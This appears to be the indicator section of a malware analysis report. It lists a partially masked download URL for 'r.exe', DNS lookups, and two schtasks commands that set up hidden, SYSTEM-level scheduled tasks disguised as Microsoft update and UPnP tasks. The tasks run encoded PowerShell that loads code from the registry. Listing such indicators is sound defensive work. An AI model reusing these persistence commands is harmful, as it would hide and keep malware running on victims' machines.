Technical Information
- <SYSTEM32>\tasks\microsoft\windows\upnp\upnpclient task
- <SYSTEM32>\tasks\microsoft\update shell
- http://www.ro######seil-finances.ch/js/tiny_mce/temp/r.exe
- DNS ASK ro######seil-finances.ch
- DNS ASK na###eli.com
- '%WINDIR%\syswow64\schtasks.exe' /create /f /ru SYSTEM /RL HIGHEST /tn "Microsoft\Update Shell" /sc hourly /mo 2 /tr "powershell -w 1 -e aQBlAHgAIAAkACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACAASABL...
- '%WINDIR%\syswow64\schtasks.exe' /create /ru SYSTEM /RL HIGHEST /f /tn "\Microsoft\Windows\UPnP\UPnPClient Task" /sc hourly /mo 1 /tr "powershell -w 1 -e aQBlAHgAIAAkACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUAB...